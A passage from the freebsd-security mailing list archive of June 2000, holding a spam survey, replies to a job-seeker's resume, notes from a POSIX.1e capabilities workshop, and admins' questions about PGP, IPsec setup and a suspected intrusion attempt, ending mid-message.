From owner-freebsd-security Sun Jun 18 7:22:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from southern-software.com (rosetta.thundercat.com [203.37.173.7]) by hub.freebsd.org (Postfix) with SMTP id AC38237BBC5; Sun, 18 Jun 2000 07:22:19 -0700 (PDT) (envelope-from info@southern-software.com) Received: from southern-software.com [198.142.196.124] by southern-software.com (SMTPD32-4.06) id A8BAC73A0392; Sun, 18 Jun 2000 00:22:34 PDT From: info@southern-software.com Reply-To: info@southern-software.com To: info@southern-software.com Subject: Can you please assist ? Date: Sun, 18 Jun 2000 00:23:37 PDT Message-Id: <20000618142219.AC38237BBC5@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ___________________________________________________________ We are a software development company that specializes in security software. For some time now we have been working on developing a Client email program that contains security features never before available. In order for us to make this program the best that it can possibly be, we ask your assistance by taking a few minutes to answer these important questions for us. Which of the following functions do you consider to be important or essential for an email program? For questions 1-7, please rate 1-5. (1 being the least important and 5 being most important). A client email program should have: Question 1: The ability to prevent certain attachments that may possibly be carrying a virus. (This allows you to accept only safe attachments) Importance Rating______ Question 2: Automatic searching for file attachments that have been renamed or tampered with. (Virus senders can rename vbs files to txt files hoping you will open them) Importance Rating______ Question 3: The ability to limit the size of incoming email and attachments. (Reduce time wasted downloading large files, graphics, audio files, jokes, etc.) Importance Rating______ Question 4: The ability to select the size of outgoing emails and attachments. (Saves bandwidth as large files are roughly doubled when transferred by email). Importance Rating______ Question 5: An encrypted Address Book. (This will stop worm viruses sending copies of itself to your clients and/or friends). Importance Rating______ Question 6: The ability to restrict the number of attachments and size of attachments sent or received. And the ability to the restrict types of attachments received. (Gives control to employers and eliminate privacy issues arising). Importance Rating______ Question 7: A viewable log file containing information such as; email deleted without being opened, when email was downloaded, when email was read (opened), if email was forwarded or replied to etc. (Mail management and accountability at a glance) Importance Rating______ Question 8: Has your company been the victim of a computer virus attack? Yes/No ________ Question 9: If yes to question 8, approximately how many hours did it take to fix the problem? Hours ________ Question 10: If an email program was developed with the above security features, would you be interested in trialing a free demonstration version? Yes/No ________ Question 11: What percentage of email traffic is personal email? __________% We sincerely thank you for your time in answering these important questions for us. Sincere thanks, Graeme A. Ryan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 18 7:23:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from southern-software.com (rosetta.thundercat.com [203.37.173.7]) by hub.freebsd.org (Postfix) with SMTP id 2A58037BB43; Sun, 18 Jun 2000 07:23:09 -0700 (PDT) (envelope-from info@southern-software.com) Received: from southern-software.com [198.142.196.124] by southern-software.com (SMTPD32-4.06) id A8E7C73A0392; Sun, 18 Jun 2000 00:23:19 PDT From: info@southern-software.com Reply-To: info@southern-software.com To: info@southern-software.com Subject: Can you please assist ? Date: Sun, 18 Jun 2000 00:24:02 PDT Message-Id: <20000618142309.2A58037BB43@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ___________________________________________________________ We are a software development company that specializes in security software. For some time now we have been working on developing a Client email program that contains security features never before available. In order for us to make this program the best that it can possibly be, we ask your assistance by taking a few minutes to answer these important questions for us. Which of the following functions do you consider to be important or essential for an email program? For questions 1-7, please rate 1-5. (1 being the least important and 5 being most important). A client email program should have: Question 1: The ability to prevent certain attachments that may possibly be carrying a virus. (This allows you to accept only safe attachments) Importance Rating______ Question 2: Automatic searching for file attachments that have been renamed or tampered with. (Virus senders can rename vbs files to txt files hoping you will open them) Importance Rating______ Question 3: The ability to limit the size of incoming email and attachments. (Reduce time wasted downloading large files, graphics, audio files, jokes, etc.) Importance Rating______ Question 4: The ability to select the size of outgoing emails and attachments. (Saves bandwidth as large files are roughly doubled when transferred by email). Importance Rating______ Question 5: An encrypted Address Book. (This will stop worm viruses sending copies of itself to your clients and/or friends). Importance Rating______ Question 6: The ability to restrict the number of attachments and size of attachments sent or received. And the ability to the restrict types of attachments received. (Gives control to employers and eliminate privacy issues arising). Importance Rating______ Question 7: A viewable log file containing information such as; email deleted without being opened, when email was downloaded, when email was read (opened), if email was forwarded or replied to etc. (Mail management and accountability at a glance) Importance Rating______ Question 8: Has your company been the victim of a computer virus attack? Yes/No ________ Question 9: If yes to question 8, approximately how many hours did it take to fix the problem? Hours ________ Question 10: If an email program was developed with the above security features, would you be interested in trialing a free demonstration version? Yes/No ________ Question 11: What percentage of email traffic is personal email? __________% We sincerely thank you for your time in answering these important questions for us. Sincere thanks, Graeme A. Ryan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 18 9:15:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from gnu.IN-Berlin.DE (gnu.in-berlin.de [192.109.42.4]) by hub.freebsd.org (Postfix) with ESMTP id A083637B6C8; Sun, 18 Jun 2000 09:15:10 -0700 (PDT) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: from uriela.in-berlin.de (root@servicia.in-berlin.de [193.175.21.3]) by gnu.IN-Berlin.DE (8.10.1/8.10.1) with ESMTP id e5IGF8x26268; Sun, 18 Jun 2000 18:15:08 +0200 (CEST) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: by uriela.in-berlin.de (Smail-3.2.0.102 1998-Aug-2 #2) id m133hj1-0058EHC; Sun, 18 Jun 2000 18:15:07 +0200 (CEST) Received: (from ripley@localhost) by server.nostromo.in-berlin.de (8.9.3/8.9.3) id DAA05203; Sun, 18 Jun 2000 03:16:56 +0200 (CEST) (envelope-from ripley) Date: Sun, 18 Jun 2000 03:16:56 +0200 From: "H. Eckert" To: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Cc: jlschwab@uswest.net Subject: Re: Resume... Message-ID: <20000618031620.B3840@server.nostromo.in-berlin.de> Reply-To: ripley@nostromo.in-berlin.de References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com>; from Jason L. Schwab on Sat, Jun 17, 2000 at 08:47:05AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoting Jason L. Schwab (jlschwab@uswest.net): > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > I am 17 years of age. > I consider my self a professional unix system administrator. Consider yourself lucky to be qualified to admin a microwave at a fastfood restaurant. This might even help you to get a chance to get a real qualification in the near future. Greetings, Ripley To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 18 9:21:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2B24937B55F for ; Sun, 18 Jun 2000 09:21:32 -0700 (PDT) (envelope-from rwatson@FreeBSD.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id MAA06686; Sun, 18 Jun 2000 12:21:27 -0400 (EDT) (envelope-from rwatson@FreeBSD.org) Date: Sun, 18 Jun 2000 12:21:27 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: posix1e@cyrus.watson.org To: posix1e@cyrus.watson.org Cc: trustedbsd-discuss@trustedbsd.org, linux-privs-discuss@sourceforge.net Subject: Capabilities workshop, followup questions Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org First I'd like to report that the recent capabilities workshop held by SGI was a great success, at least from my perspective. A number of wrinkles were worked out, and it looks like the resulting implementations will be consistent and highly interoperable from an application perspective, as well as from the perspective of analysis for evaluation. I'd like to publically thank Casey and the others at SGI who made the event work so well :-). There are a few followup questions in my mind. First, for the purposes of a record (as it was pointed out at the meeting that for POSIX.1e discussions, there really hasn't been a record), I think it would be useful for us to write up our conclusions. In particular, conclusions as to what the correct interaction between uid-based models and capability-based models should be, and rationale for that. Additionally, what we concluded as correct behavior for environments where (a) no on-disk capabilities are available, (b) situations where capabilities are available but undefined for an executable. Finally, we reached some conclusions about inheritence properties over exec(), and probably ought to describe rationale for that also. I didn't take notes during the meeting, so I'll just address the ones that I come to off the top of my head. We concluded that the superuser security model and capability-based models should be, wherever possible, independent. We found it difficult to reason effectively about the variety of "emulation" options, and found that the interactions often resulted in what was generally agreed to be in violation of POLA. One important aspect to the discussion was migration path: all parties seemed to be in agreement that the eventual goal was removal of a privileged uid 0, but that the migration path would be long and painful :-). The stepping stones appeared to be: - Capabilities support without file system backing, privileged uid0 - Capabilities support with file backing, privileged uid0 - Capabiltiies support with file backing There was fairly heated debate on the topic of the merged uid/capability implementation in Linux, with objections to it including complexity and interoperability. Positive considerations for the model included a possibly easier migration path with the opportunity to use capabilities to improve security in the short term, prior to file system backing. The eventual pseudo-code for the authorization check looked something like the following (with a slightly bsd-esque twist) int capable(credential, capability) { if (cap_check(credential, capability) && optional_capability_mask(capability)) { /* audit() */ return (1); } if (suser(credential) && optional_suser_mask(capability) && suser_enabled()) { /* audit() */ return (1); } return (0); } There was discussion of introducing both a global capability mask at inheritence time and runtime, as well as a per-process bound inherited and modifiable only with privilege. There did seem to be general support for a global bound, not unlike BSD secure-levels, disabling specific capabilities for all processes. There was also discussion of whether or not the same bound should apply to super-user authorization, and that sounded good to many also. There was an objection (mine) to conditionalizing suser behavior on whether or not capabilities were present on a proces -- generally that this caused more interaction between the two mechanisms, which would limit extensible authorization techniques such as Poligraph. Per-process bounds, we concluded, had to be thought through. It did seem to be the case that such behavior might be useful (jail-like), but that it would open the door to more attacks like the sendmail attack if permitted for unprivileged processs (not unlike chroot). There was general discussion about whether jail techniques should or should not be integrated with capabilities. I don't think there was concensus about introducing per-process capability bounds, but that there was for global bounds, and that the global bounds would be instituted at authorization, not inheritence. Given that different systems have different ways of managing kernel configuration at run time, and that global bounds are likely part of system bootup, I don't think there was consideration of an API for doing that. At least in the FreeBSD implementation, this is managed using a sysctl(), but /proc in Linux-land might be a good way. Monotonicity for a global bound sounds useful. One issue that was discussed is behavior on file systems supporting capabilities, but with capability sets undefined for a binary. Two prevailing views seemed to hold: James Buster argued that POLA requires that these binaries inherit capabilities from the parent process, if the parent permits it. Casey believed that they should only be inherited if the binary was explicitely configured to accept them. The second appealed due to security, but is counter-intuitive for many uses. One possibility is to assign appropriate capability acceptence on all binaries in the TCB, allowing audited system binaries to accept capabilities, but not custom binaries that haven't been vetted by the system administrator. As one potential use of capabilities is assigning a shell CAP_DAC_READ, it would indeed be violating POLA if shell-built-in functions worked to read files, but external programs didn't :-). Finally, I had a few questions about things we did not resolve. First, in the setuid world, modifications to the setuid binary result in removal of the setuid bit. Should modifications to a capabilities binary result in capabilities being removed? Richard Offer and I discussed issues of threading and capabilities in the morning, and brought it up again briefly in the afternoon. Ted Ts'o noted that the Linux uid handling for POSIX threads is currently not correct according to spec (which might break things in an m:n threading model), and I was interested in whether or not the same problems will occur with capabilities. In the POSIX world, privilege and credentials are bound to processes, and not threads; this is how it is in FreeBSD currently as we don't support kernel threads except under emulation. Will the Linux implementation bind capabilities to individual threads? As I don't have a copy of D16, I can't comment on the rule set differences, but it sounded to me like we firmly concluded the D16 inheritence rules were the way to go. Could someone post the conclusions on that? I've presumably missed some stuff here, and would welcome comments and criticisms. I've set the Relpy-To to the POSIX.1e cross-platform mailing list, as the resolution to these issues is relevant to all platforms, especially in the name of application portability. I've CC'd it to the two capabilities implementation mailing lists I know of -- the TrustedBSD discussion list, and the linux-privs list. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 18 13: 4: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from adsl-63-201-55-220.dsl.snfc21.pacbell.net (adsl-63-201-55-220.dsl.snfc21.pacbell.net [63.201.55.220]) by hub.freebsd.org (Postfix) with ESMTP id C496A37BA06 for ; Sun, 18 Jun 2000 13:03:57 -0700 (PDT) (envelope-from jwgray@netbox.com) Received: from netbox.com (adsl-63-201-55-220.dsl.snfc21.pacbell.net [63.201.55.220]) by adsl-63-201-55-220.dsl.snfc21.pacbell.net (8.9.3/8.9.3) with ESMTP id NAA64198; Sun, 18 Jun 2000 13:03:31 -0700 (PDT) (envelope-from jwgray@netbox.com) Message-ID: <394D2B13.47307E1A@netbox.com> Date: Sun, 18 Jun 2000 13:03:31 -0700 From: Jeff Gray Reply-To: jwgray@netbox.com X-Mailer: Mozilla 4.08 [en] (X11; I; Linux 2.0.36 i386) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: PGP keys and signing Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Struggling with two PGP issues, hoping that someone can help enlighten me. Same problem on both 3.3 and 4.0 so not likely to be OS caused. PGP5 from ports used. 4.0 box never had PGP on it. 1. can encrypt, but not decrypt message from recipient. pgpe -r name@address.com -at file works fine. 'name' receives and can decrypt. when recipient sends to me I cannot decrypt. pgpk -c shows that the key is in the right place and matches. If I go to my PGP5 version on my Mac I can decrypt the message. Ideas? 2. signing. pgpe -r name@address.com -sat file encrypts fine but does not sign even tried -s -u userid and still does not sign. pgps -u user -at file signs as it should. Cannot figure out how to encrypt and sign in one step. Thoughts appreciated. Thanks jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 18 15:25:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from pop.idx.com.au (pop.idx.com.au [203.14.30.10]) by hub.freebsd.org (Postfix) with ESMTP id D868E37B56A; Sun, 18 Jun 2000 15:24:54 -0700 (PDT) (envelope-from dannyh@idx.com.au) Received: from desktop.freebsd.org (tntwc01-3-126.idx.com.au [203.166.3.126]) by pop.idx.com.au (8.9.3/8.9.3) with SMTP id IAA19879; Mon, 19 Jun 2000 08:24:36 +1000 From: Danny To: "Jason L. Schwab" , , Subject: Re: Resume... Date: Tue, 20 Jun 2000 08:30:50 +1000 X-Mailer: KMail [version 1.0.21] Content-Type: text/plain References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> MIME-Version: 1.0 Message-Id: <00062008333302.00328@desktop.freebsd.org> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I believe if you goto the freebsd website there is a hyperlink for a FreeBSD jobs mailing list. Maybe is called freebsd_jobs@freebsd.org maybe is a more suitable area to most your resume. On Sun, 18 Jun 2000, Jason L. Schwab wrote: > >%_Hello Everyone; > > Hi. My name is Jason L. Schwab. How are you doing today? > > Well first of all, let me tell you a lilttle about my self. I am 17 > years of age. I am located in Albuquerque, New Mexico, USA. I have just > over 5 years of Unix and Linux expereince. I am looking to get alot more > expereince in the internet and/or unix servers area. I am looking todo > this by working for an Internet Service Provder. > > The list below contains a very small portion of my capabilities. > > - Perl Programming > - C/C++ Programming > - HTML Programming > - CGI Programming > - Apache (Complete Configuration) > - DNS / BIND / NAMED Primary/Secondary > - Mail Servers (postfix/sendmail/qmail) > - FTP Servers (wuftpd/ncftpd/proftpd/ftpd-bsd) > - SSH (of course ;)) > - syslogd (logging to outside hosts) > - Kernels and System Upgrades > - Security Knowledge (tripwire/kern.securelevel) > - Firewalls and Networking > - Windows 95/98 Tech. Support > - Unix/Linux Tech. Support (*BSD/Linux Only) > > There is alot more items on that list! Its just a small part of my > capabilities, and I am learning more by the day. One of my favorite > hobbies of mine is remote unix administration, I think its the best job > any one could ever have, so yes I am willing todo remote unix > administration. I am looking todo mainly networking and security. > > As far as my security knowledge is, I have been doing unix and linux > security for just over 3 years now. In this time period I have never had a > security problem ever. Just to test my own security knowledge, I hosted > a machine running BSD and I gave out a public account on it, I emailed > every unix and linux security mailing list with the login information I > had over 500 people trying to breach my security and for the three months > I ran it, no one, not a single person compromised that machine. > > I have worked for an Internet Service Provider before, NMIA.COM, > New Mexico Internet Access, which was strickly temporary employment > which is why I no longer work there. I was doing Client Firewalling, Unix > Programming and alot of misc. tasks. > > I consider my self a professional unix system administrator. I have ran > two small web hosting companies for friends of mine, I have helped > administrate about a total of 10 small web hosting and unix shell > account servers worldwide. So I have a wide range of > expereince within the unix and linux area. > > Sincerely, > Jason L. Schwab - jlschwab@uswest.net > > > > ---------------------------------------- Content-Type: text/html; name="unnamed" Content-Transfer-Encoding: quoted-printable Content-Description: ---------------------------------------- -- ------------------------------------------------------------ You are not authorized to use my email address for spam or any purpose whatsoever. Remove my email address from your databases immediately and do not attempt to email me in any way. ------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 18 16:14: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 94B1F37BADA; Sun, 18 Jun 2000 16:13:56 -0700 (PDT) (envelope-from dave@elvis.mu.org) Received: by elvis.mu.org (Postfix, from userid 1088) id B820F2B254; Sun, 18 Jun 2000 18:13:55 -0500 (CDT) Date: Sun, 18 Jun 2000 18:13:55 -0500 From: Dave McKay To: Danny Cc: "Jason L. Schwab" , freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Resume... Message-ID: <20000618181355.A24317@elvis.mu.org> References: <003801bfd873$4ba66d20$5a54a0d0@jlschwab.simphost.com> <00062008333302.00328@desktop.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <00062008333302.00328@desktop.freebsd.org>; from dannyh@idx.com.au on Tue, Jun 20, 2000 at 08:30:50AM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, just post to dice.com, monster.com or headhunter.net, usually the freebsd-jobs lists are for recruiters. > Maybe is called freebsd_jobs@freebsd.org > > maybe is a more suitable area to most your resume. > > On Sun, 18 Jun 2000, Jason L. Schwab wrote: > > >%_Hello Everyone; > > > > Hi. My name is Jason L. Schwab. How are you doing today? > > > > Well first of all, let me tell you a lilttle about my self. I am 17 > > years of age. I am located in Albuquerque, New Mexico, USA. I have just > > over 5 years of Unix and Linux expereince. I am looking to get alot more > > expereince in the internet and/or unix servers area. I am looking todo > > this by working for an Internet Service Provder. Being 17 years of age is going to bring you bias in the field. Also 5 years experience on most resumes means you have 5 years in the field working on live production systems. > > There is alot more items on that list! Its just a small part of my > > capabilities, and I am learning more by the day. One of my favorite > > hobbies of mine is remote unix administration, I think its the best job > > any one could ever have, so yes I am willing todo remote unix > > administration. I am looking todo mainly networking and security. Remote administration is possible, but not plausable, what happens when a server of yours crashes? Termservers are costly in a large production environment. > > > > As far as my security knowledge is, I have been doing unix and linux > > security for just over 3 years now. In this time period I have never had a > > security problem ever. Just to test my own security knowledge, I hosted > > a machine running BSD and I gave out a public account on it, I emailed > > every unix and linux security mailing list with the login information I > > had over 500 people trying to breach my security and for the three months > > I ran it, no one, not a single person compromised that machine. Having scriptkiddies run around on your box is not a test of security. And bugtraq/rootshell are usually around 3 months behind the times. > > I consider my self a professional unix system administrator. I have ran > > two small web hosting companies for friends of mine, I have helped > > administrate about a total of 10 small web hosting and unix shell > > account servers worldwide. So I have a wide range of > > expereince within the unix and linux area. Be careful how you word these things, some people may take offense to your "wide range" of skills. -- Dave McKay Network Engineer - Google Inc. dave@mu.org - dave@google.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 18 21:49:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from spike.brainlink.com (spike.brainlink.com [206.127.59.100]) by hub.freebsd.org (Postfix) with ESMTP id 40A4537BBB9 for ; Sun, 18 Jun 2000 21:49:22 -0700 (PDT) (envelope-from spork@spike.brainlink.com) Received: (from spork@localhost) by spike.brainlink.com (8.9.3/8.9.3) id AAA01498 for freebsd-security@freebsd.org; Mon, 19 Jun 2000 00:48:02 -0400 (EDT) (envelope-from spork) Date: Mon, 19 Jun 2000 00:48:02 -0400 From: Spike Gronim To: freebsd-security@freebsd.org Subject: Ipsec misconfiguration problem Message-ID: <20000619004802.A1461@spike.brainlink.com> Reply-To: gronimw@stuy.edu Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="r5Pyd7+fXNt84Ff3" X-Mailer: Mutt 1.0.1i X-PGP-Public-Key: http://www.gronim.com/spike/pubkey.asc X-PGP-fingerprint: 05 92 88 05 3C DB F2 40 AB 1D AE 2A F0 E5 FA A5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --r5Pyd7+fXNt84Ff3 Content-Type: text/plain; charset=us-ascii Hey. I'm trying to set up a simple ipsec connection between two computers on my LAN (192.168.0.1 and 192.168.0.200). I'm going for ipsec esp in transport mode with authentication. I tried a lot of things, and then copied the NetBSD documentation setup (http://www.netbsd.org/Documentation/network/ipsec/#sample_esp) : (long lines wrapped) [ipsec.conf] add 192.168.0.1 192.168.0.200 esp 9876 -E des-cbc "hogehoge"; add 192.168.0.200 192.168.0.1 esp 10000 -E des-cbc "mogamoga"; add 192.168.0.1 192.168.0.200 ah 9877 -A hmac-md5 "hogehogehogehoge"; add 192.168.0.200 192.168.0.1 ah 10001 -A hmac-md5 "mogamogamogamoga"; spdadd 192.168.0.1 192.168.0.200 any -P out\ ipsec esp/transport//use ah/transport//use; [ipsec.conf] 'setkey -D' and 'setkey -D -P' on 192.168.0.1 are attached. The ipsec.conf file for setkey on 192.168.0.200 is the same as that on 192.168.0.1, with the IPs swapped. The ipsec code sees my keys, my security associations, and my security policies. Yet, when I 'ping 192.168.0.200', tcpdump shows me straight ICMP instead of ESP, and neither side's sequences or byte counters increment. I'm not sure what I'm doing wrong. Thanks. --Spike Gronim gronimw@stuy.edu "Oh yes? An obscene triangle which, has more courage than the word." --r5Pyd7+fXNt84Ff3 Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=setkey-d 192.168.0.200 192.168.0.1 ah mode=any spi=10001(0x00002711) replay=4 flags=0x00000000 A: hmac-md5 6d6f6761 6d6f6761 6d6f6761 6d6f6761 state=mature seq=3 pid=1491 created: Jun 19 00:38:23 2000 current: Jun 19 00:47:30 2000 diff: 547(s) hard: 0(s) soft: 0(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 refcnt=1 192.168.0.1 192.168.0.200 ah mode=any spi=9877(0x00002695) replay=4 flags=0x00000000 A: hmac-md5 686f6765 686f6765 686f6765 686f6765 state=mature seq=2 pid=1491 created: Jun 19 00:38:23 2000 current: Jun 19 00:47:30 2000 diff: 547(s) hard: 0(s) soft: 0(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 refcnt=1 192.168.0.200 192.168.0.1 esp mode=any spi=10000(0x00002710) replay=4 flags=0x00000000 E: des-cbc 6d6f6761 6d6f6761 state=mature seq=1 pid=1491 created: Jun 19 00:38:23 2000 current: Jun 19 00:47:30 2000 diff: 547(s) hard: 0(s) soft: 0(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 refcnt=1 192.168.0.1 192.168.0.200 esp mode=any spi=9876(0x00002694) replay=4 flags=0x00000000 E: des-cbc 686f6765 686f6765 state=mature seq=0 pid=1491 created: Jun 19 00:38:23 2000 current: Jun 19 00:47:30 2000 diff: 547(s) hard: 0(s) soft: 0(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 refcnt=1 --r5Pyd7+fXNt84Ff3 Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=setkey-d-p 192.168.0.1[any] 192.168.0.200[any] any out ipsec esp/transport//use ah/transport//use seq=0 pid=1492 refcnt=1 --r5Pyd7+fXNt84Ff3-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 19 6:21:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from relay.inforser.ru (relay.inforser.ru [195.54.223.182]) by hub.freebsd.org (Postfix) with ESMTP id 4745237B653 for ; Mon, 19 Jun 2000 06:21:00 -0700 (PDT) (envelope-from oleg@inforser.ru) Received: from iNDiAN (164.inforser.ru [195.54.223.164]) by relay.inforser.ru (8.9.2/8.9.3) with SMTP id RAA26721 for ; Mon, 19 Jun 2000 17:18:52 +0400 (MSD) Message-ID: <002b01bfd9f1$03fb2680$a4df36c3@Inforser.Ru> From: "Oleg Strizhak" To: "FreeBSD-security" Subject: tried to be cracked Date: Mon, 19 Jun 2000 17:19:34 +0400 Organization: Inforser MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all! Today seeng this in messages: Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned = by uid 65534 Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned = by uid 65534 checked all the logs -- there was no login via telnet, ssh. Nothing of = activity was detected for that period of time on my http or ftp daemons. = So I suppose that it was through one of the predifined inetd services.=20 Here is my inetd.conf's enabled nodes: ftp stream tcp nowait root /usr/local/sbin/proftpd proftpd telnet stream tcp nowait root /usr/libexec/telnetd telnetd shell stream tcp nowait root /usr/libexec/rshd rshd login stream tcp nowait root /usr/libexec/rlogind rlogind finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s comsat dgram udp wait tty:tty /usr/libexec/comsat comsat ntalk dgram udp wait tty:tty /usr/libexec/ntalkd ntalkd # # IPv6 services # ftp stream tcp6 nowait root /usr/local/sbin/proftpd proftpd telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd shell stream tcp6 nowait root /usr/libexec/rshd rshd login stream tcp6 nowait root /usr/libexec/rlogind rlogind finger stream tcp6 nowait/3/10 nobody /usr/libexec/fingerd fingerd -s Question is: which of these daemons can be disabled (or even inetd = itself) w/o any harm. I've no use of NFS -- plain http/ftp/pop server. = SMTP and POP stuff is already handled by tcpserv. I've already set up hosts.allow: denied any w/o reverse DNS, allowed any = ftp, portmap, and ssh; denied all other daemons/users except trusted = address. Where can I find out additional info about hosts.allow syntax? Thanx in advance. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 19 6:45:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from as.tksoft.com (gyw.com [209.55.67.177]) by hub.freebsd.org (Postfix) with ESMTP id 3F7A837BCD7 for ; Mon, 19 Jun 2000 06:45:51 -0700 (PDT) (envelope-from tjk@tksoft.com) Received: (from tjk@tksoft.com) by uno.tksoft.com (8.8.8/8.8.8) id GAA07969; Mon, 19 Jun 2000 06:51:43 -0700 From: "tjk@tksoft.com" Message-Id: <200006191351.GAA07969@uno.tksoft.com> Subject: Re: tried to be cracked To: oleg@inforser.ru (Oleg Strizhak) Date: Mon, 19 Jun 2000 06:51:43 -0700 (PDT) Cc: FreeBSD-security@FreeBSD.ORG In-Reply-To: <002b01bfd9f1$03fb2680$a4df36c3@Inforser.Ru> from "Oleg Strizhak" at Jun 19, 0 05:19:34 pm Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You don't need any service you don't know about. You can disable all of them, except ftp and telnet, if you use telnet. You should also not have any daemons running which you don't use. mountd, nfsd, portmap, etc.. Try "man hosts.allow" or "man hosts_access" (not at a FreeBSD box right now, so can't check.) Anyway, you can use "netstat -n -a" to find out what ports you have open. Troy > > Hi all! > > Today seeng this in messages: > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534 > Jun 17 03:30:01 servak su: _secure_path: /xxx/.login_conf is not owned by uid 65534 > > checked all the logs -- there was no login via telnet, ssh. Nothing of activity was detected for that period of time on my http or ftp daemons. So I suppose that it was through one of the predifined inetd services. > > Here is my inetd.conf's enabled nodes: > > ftp stream tcp nowait root /usr/local/sbin/proftpd proftpd > telnet stream tcp nowait root /usr/libexec/telnetd telnetd > shell stream tcp nowait root /usr/libexec/rshd rshd > login stream tcp nowait root /usr/libexec/rlogind rlogind > finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s > comsat dgram udp wait tty:tty /usr/libexec/comsat comsat > ntalk dgram udp wait tty:tty /usr/libexec/ntalkd ntalkd > > > # > # IPv6 services > # > ftp stream tcp6 nowait root /usr/local/sbin/proftpd proftpd > telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd > shell stream tcp6 nowait root /usr/libexec/rshd rshd > login stream tcp6 nowait root 